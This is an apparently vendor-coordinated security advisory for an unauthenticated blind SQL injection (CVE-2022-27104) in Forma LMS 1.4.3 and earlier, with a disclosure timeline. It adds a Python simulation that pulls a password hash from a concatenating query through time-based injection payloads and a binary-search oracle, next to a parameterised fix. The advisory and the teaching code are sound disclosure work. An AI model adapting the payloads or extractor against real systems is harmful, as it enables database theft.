Unauthenticated SQL Injection in Forma LMS <= 1.4.3
Swascan's Offensive Security Team has identified a vulnerability in Forma LMS.
Forma Lms
Forma Lms is the natural evolution, or a “fork”, of the last open source version of the LMS platform Docebo.
Forma Lms is an open source e-learning platform, oriented towards business needs: integrability, automatic notifications and automatic enrolment policies, organisational chart, automatic certificates and of course all the typical functions of an LMS.
The product includes flexible user management, white labelling, reporting, online and classroom course management, and videoconferencing. From version 3.x it also integrates H5P for content creation.
The project is run by the non-profit Forma.Association, with over 50 companies, 200 personal members and 4,000 community users who constantly add new features and make the software more complete and secure.
Many other companies around the world use Forma LMS.
Technical summary
Swascan's Cyber Security Team discovered an important vulnerability in Forma LMS <= 1.4.3.

| Vulnerability | CVSS 3.1 |
| --- | --- |
| Forma LMS <= 1.4.3 – SQL Injection (unauthenticated) | 8.6 – High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L) |
The application is vulnerable to unauthenticated SQL Injection attacks.
A remote, unauthenticated attacker could exploit this vulnerability to access the application database. Once exploited, the attacker can exfiltrate or overwrite the data it contains.
However, exploitation requires a large number of HTTP requests: the injection is blind, so data must be retrieved one character at a time through a time-based technique (a conditional delay whose presence or absence leaks one bit per request).
Version 1.x of Forma LMS reached its end of support in 2019. Forma.Association invites its users to migrate to the current 3.x versions, which support newer coding standards and software layers, including the latest PHP version.
In agreement with Forma, no PoC or details of the vulnerable component will be published.
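To make the cost described above concrete, here is a constructed Python simulation of the time-based blind technique. It is an added example: it is not Swascan's PoC, not Forma LMS code, and it says nothing about the undisclosed vulnerable component. The `users` table and its row, the endpoint functions, and the `sleep()` stub that stands in for MySQL's `SLEEP()` (SQLite has none, so the delay is recorded rather than waited for) are all assumptions made for the demo. The block pairs a query built by string concatenation with its parameterised form, then recovers a column one character at a time through a conditional delay, counting the requests it takes.

```python
"""Constructed simulation of time-based blind SQL injection.

Generic illustration only: not Forma LMS code and not the undisclosed
vulnerable component. Schema, sample row and endpoint are assumptions.
"""
import sqlite3

SLEEP_SECONDS = 3  # delay the injected condition asks the database to add


class SimulatedServer:
    """A constructed endpoint that concatenates user input into SQL.

    SQLite has no SLEEP(); the registered sleep() stub records the delay
    MySQL's SLEEP() would introduce, so timing is simulated, not measured.
    """

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users (id INTEGER, login TEXT, pw_hash TEXT)")
        # constructed sample row; the hash is an arbitrary 32-hex-char string
        self.conn.execute(
            "INSERT INTO users VALUES (1, 'admin', 'c4ca4238a0b923820dcc509a6f75849b')"
        )
        self.conn.create_function("sleep", 1, self._fake_sleep)
        self.requests = 0
        self._delay = 0

    def _fake_sleep(self, seconds):
        self._delay += seconds
        return 0

    def vulnerable_lookup(self, login):
        """Returns the simulated response time. BUG: login is concatenated."""
        self.requests += 1
        self._delay = 0
        self.conn.execute(f"SELECT id FROM users WHERE login = '{login}'").fetchall()
        return self._delay

    def hardened_lookup(self, login):
        """Same query with a bound parameter: input never reaches the SQL parser."""
        self.requests += 1
        self._delay = 0
        self.conn.execute("SELECT id FROM users WHERE login = ?", (login,)).fetchall()
        return self._delay


def delayed(lookup, condition_sql):
    """Time-based oracle: True iff the injected condition held.

    MySQL shape would be  ' OR IF(<cond>, SLEEP(3), 0)='  ; SQLite needs CASE.
    """
    payload = (
        f"' OR (CASE WHEN ({condition_sql}) THEN sleep({SLEEP_SECONDS}) ELSE 0 END)='"
    )
    return lookup(payload) >= SLEEP_SECONDS


def char_condition(pos, threshold):
    """Ask whether character `pos` of the admin hash is above `threshold`."""
    return (
        f"(SELECT unicode(substr(pw_hash, {pos}, 1)) FROM users WHERE id = 1)"
        f" > {threshold}"
    )


def extract_via_timing(lookup, length):
    """Recover `length` characters one at a time, 6-7 requests each
    (binary search over printable ASCII 32..126)."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if delayed(lookup, char_condition(pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    server = SimulatedServer()
    print(extract_via_timing(server.vulnerable_lookup, 32), server.requests)
    server = SimulatedServer()
    print(repr(extract_via_timing(server.hardened_lookup, 4)), server.requests)
```

Against the concatenating endpoint the 32-character value comes back in roughly 200 requests, each of which the server delays by 3 s whenever the guessed condition holds; against the parameterised endpoint the same attack yields only spaces, because the oracle never fires. On a real MySQL target the oracle would compare measured response time against a threshold and need retries to absorb network jitter, which is why the advisory counts the request volume as the practical obstacle.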
Disclosure Timeline
- 04-03-2022: Vulnerability discovered
- 07-03-2022: Vendor contacted by email
- 08-03-2022: Report shared with vendor
- 09-03-2022: Meeting with Forma Association and vulnerability confirmation
- 10-03-2022: CVE ID CVE-2022-27104 issued